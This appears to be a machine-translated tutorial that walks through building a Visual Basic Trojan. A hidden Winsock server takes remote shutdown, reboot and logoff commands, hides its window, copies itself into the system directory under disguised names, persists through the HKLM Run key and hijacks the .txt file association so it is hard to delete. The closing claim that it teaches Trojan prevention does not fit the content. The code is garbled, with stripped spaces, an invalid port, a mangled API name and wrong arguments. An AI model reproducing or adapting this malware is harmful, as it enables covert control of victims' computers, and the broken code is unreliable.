First, create a new project named Server, create a new form with Name as Server, add a winsock control to the form, set Name to sckServer, and set the protocol to the default TCP/ip protocol.
Next, we go back to the Server form module and add the following code:
->PRivateSubform_Load()
WithMe
.sckServer.LocalPort=88917'Local port (haha! My birthday!)
.sckServer.Listen'Start listening
EndWith
EndSub
'Accept the client's connection request.
PrivateSubsckServer_ConnectionRequest(ByValrequestIDAsLong)
WithMe
If.sckServer.State<>sckClosedThen.sckServer.Close
.sckServer.Accept(requestID)
EndWith
EndSub->
Next, let's create a client program: create a new project named Client, name the form Client, add a winsock control on it, named sckClient, and the protocol is TCP/IP protocol. Add another button cmdConnect and add code to the form module:
->PrivateSubform_Load()
WithMe
.sckClient.RemoteHost=127.0.0.1'Set the remote IP. In this example, set it to the local machine.
.sckClient.RemotePort=88917'Remote port is the same as the setting in the server.
EndWith
EndSub
PrivatesubcmdConnect_Click()
SckClient.Connect
Endsub->
At this point, when we click the Connect button, our two projects can communicate, but they are not visible. You can add code to the sckClient_Connect event in the Client: debug.printConnetionsuccessful! to see it.
This is only the first step, and there is no work done at all. Let's add functionality to them. For the sake of simplicity, this article only implements a few small functions-shutdown, restart, and logout. OK, let’s get started!
Create a new module in the Server project with the name modApi. This module contains some API functions. Add the following API functions:
->PublicDeclareFunctionExitWindowXXXLibuser32AliasExitWindowXXX(ByValuFlagsAsLong,ByValdwReservedAsLong)AsLong
PublicConstEWX_LOGOFF=0
PublicConstEWX_REBOOT=2
PublicConstEWX_SHUTDOWN=1
PublicDeclareFunctionClipCursorLibuser32AliasClipCursor(lpRectAsAny)AsLong
PublicTypeRECT
LeftAsLong
TopAsLong
RightAsLong
BottomAsLong
EndType->
Note: In programming between two sockets, the important event for communication is the DataArrival event, which is used to receive remote data.
Next, put three buttons in the Client form of the Client project, namely cmdExit, cmdLogoff, and cmdReboot. They are used for remote shutdown, logout, and restart operations. Add the following codes respectively:
->PrivateSubcmdExit_Click()
Me.sckClient.SendDataExit
EndSub
PrivateSubcmdLogoff_Click()
Me.sckClient.SendDataLogoff
EndSub
PrivateSubcmdReboot_Click()
Me.sckClient.SendDataReboot
EndSub->
All requests are made to the server. Now go to the Server project: add the DataArrial event of sckServer in the Server to receive the client's request.
->PrivateSubsckServer_DataArrival(ByValbytesTotalAsLong)
DimstrDataAsString
WithMe
'Receive information requested by the customer
.sckServer.GetDatastrData
SelectCasestrData
CaseExit
'Shut down
CallExitWindowXXX(EWX_SHUTDOWN,0)
CaseReboot
'Restart
CallExitWindowXXX(EWX_REBOOT,0)
CaseLogoff
'Logout
CallExitWindowXXX(EWX_LOGOFF,0)
EndSelect
EndWith
EndSub->
Okay, now we have implemented the function, but not yet, we want it to run behind the scenes. This is simple, add a sentence: me.hide to the form_Load event in the Server. Fortunately, it is invisible now, but everyone knows that the Trojan runs automatically as soon as the computer is turned on. Why is this and how is it achieved? Add it to the startup group in the registry? Yes, good, come with me!
Go back to modApi in the Server project and add the following API function:
->PublicDeclareFunctionRegOpenKeyLibadvapi32.dllAliasRegOpenKeyA(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
PublicDeclareFunctionRegSetvalueExLibadvapi32.dllAliasRegSetvalueExA(ByValhKeyAsLong,ByVallpvalueNameAsString,ByValReservedAsLong,ByValdwTypeAsLong,lpDataAsAny,ByValcbDataAsLong)AsLong
PublicDeclareFunctionRegCreateKeyLibadvapi32.dllAliasRegCreateKeyA(ByValhKeyAsLong,ByVallpSubKeyAsString,phkResultAsLong)AsLong
PublicConstREG_BINARY=3
PublicConstREG_SZ=1
PublicConstHKEY_LOCAL_MACHINE=&H80000002
PublicConstHKEY_CLASSES_ROOT=&H80000000->
A process that writes to the registry startup group.
->PublicSubStartupGroup()
DimsKeyAsString
DimresultAsLong
DimhKeyIDAsLong
DimsKeyValAsString
sKey=Systrsy'Start the key in the group and find one that is similar to the system file.
sKeyVal=C:/windows/system/systrsy.exe'The path of the Trojan file. You can use GetSystemDirectory to obtain the system path.
result=RegOpenKey(HKEY_LOCAL_MACHINE,_
Software/Microsoft/Windows/CurrentVersion/Run,hKeyID)
Ifresult=0Then
result=RegSetvalueEx(hKeyID,sKey,0&,REG_SZ,sKeyVal,Len(sKey) 1)
EndIf
EndSub->
Well, that's it. However, have you ever thought about it, if you are not a novice and delete it from the registry, wouldn't our hard work be wasted? No, you have to make it impossible to delete it even if he finds it. Please look at the code below:
->PublicSubWriteToTxt()
DimresultAsLong
DimhKeyIDAsLong
DimskeyAsString
DimskeyValAsString
skey=txtfile/shell/open/command
skeyVal=C:/windows/system/txtView.exe
result=RegOpenKey(HKEY_CLASSES_ROOT,skeyVal,hKeyID)
Ifresult=0Then
result=RegSetvalueEx(hKeyID,skey,0&,REG_SZ,skeyVal,Len(skeyVal) 1)
EndIf
EndSub->
Many friends must have known at a glance that it was originally associated with the txt file, which is not bad at all, but where did C:/windows/system/txtView.exe come from? Our Trojan is C:/windows/system/systrsy .exe. This is the clone of our Trojan horse.
Okay, go back to the form_Load of the Server form of the Server project and add the following code:
->DimsCurrentPathAsString,sSystemDirAsString
sCurrentPath=App.Path&/&App.EXEName&.exe
sSystemDir=C:/windows/system
OnErrorResumeNext
'Copy the file to Systrsy.exe in the system directory
FileCopysCurrentPath,sSystemDir&/Systrsy.exe
OnErrorResumeNext
Copy the file to txtView.exe in the system directory
FileCopysCurrentPath,sSystemDir&/txtView.exe->
call
->CallstartupGroup
CallWriteToTxt
'Determine whether the program is running
IfApp.PrevInstanceThen
'Exit if already running.
End
EndIf->
Notice:
1. When dealing with ports, it is best to use high-end ports, otherwise they will conflict with some commonly used ports.
2. It is best to read relevant books when using VB.NET for the first time.
->
The above is how to use Visual Basic to prevent Trojan attacks. I hope you all know yourself and the enemy and take precautions before they happen!